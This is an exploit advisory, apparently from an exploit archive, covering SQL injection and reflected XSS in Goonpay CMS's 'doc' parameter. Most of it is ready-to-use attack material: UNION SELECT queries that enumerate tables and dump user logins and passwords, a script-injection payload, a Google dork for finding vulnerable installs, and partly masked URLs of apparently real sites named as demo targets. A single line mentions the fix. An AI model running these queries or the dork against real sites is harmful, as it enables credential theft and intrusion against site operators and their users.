#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# Exploit Title: Goonpay CMS Multiple Vulnerabilities
# Date: 2013 12 October
# Author: Arsan
# Vendor Homepage: http://www.goonpay.com
# Version : All Versions
# Security Risk: High
# Tested on: Backtrack
# Category: webapps
# Google Dork: inurl:"/?doc=" , intext:"Conception graphique : goonpay.com"
#
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# [+] Exploit :
#
# [-] Description :
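# SQL injection and reflected XSS in the "doc" parameter of index.php :
# http://<server>/?doc=[SQL-Injection][XSS]
# The queries and payload below suggest that "doc" reaches a SQL statement and the HTML response without validation or escaping; binding it as a query parameter and HTML-encoding it on output would address both issues.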
# [-] Description Exploit :
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# ----------[SQL Injection]
# (+) Tables Name:
# (+) Query :
# +union+select+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables where table_schema=database()--
# _recettes
# departements
# doctypes
# documents
# galeries
# notesRecettes
# sharedRecettes
# timesConvertor
# users
# usersaccreditations
# userslvl
# ----------
# (+) User Table (users) Columns :
# (+) Query :
# +union+select+1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.columns where table_name=0x7573657273
# id
# login
# pass
# nom
# mail
# dept
# userlvl
# adresse
# tel
# prenom
# date_naissance
# lieu_naissance
# cp
# ville
# nom_entreprise
# lieu_entreprise
# domaine_competence_entreprise
# fonction_entreprise
# tel_pro
# hobbies
# photo
# ----------
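# (+) Logins and passwords, joined as login:pass (0x3a is the hex encoding of ":"); the advisory does not say whether "pass" holds hashes or plaintext :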
# (+) Query :
# +union+select+1,2,group_concat(login,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from users
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# ----------[XSS]
# Proof of concept: this value, passed in "doc", is returned unescaped and executes in the browser :
# "><script>alert(/Arsan/)</script>
# Example :
# http://dietiXoandco.fr/?doc="><script>alert(/Arsan/)</script>
# http://redXden.com/?doc="><script>alert(/Arsan/)</script>
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# [+] Demo :
#
# http://dietisXoandco.fr/?doc=[SQL-Injection][XSS]
# http://redraXen.com/?doc=[SQL-Injection][XSS]
#
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
#
# [+] Contact Me :
#
# Arsan.Blackhat@gmail.com
# Twitter.com/ArsanBlackhat
#
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
# I L0ve Inj3ct0r Team
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#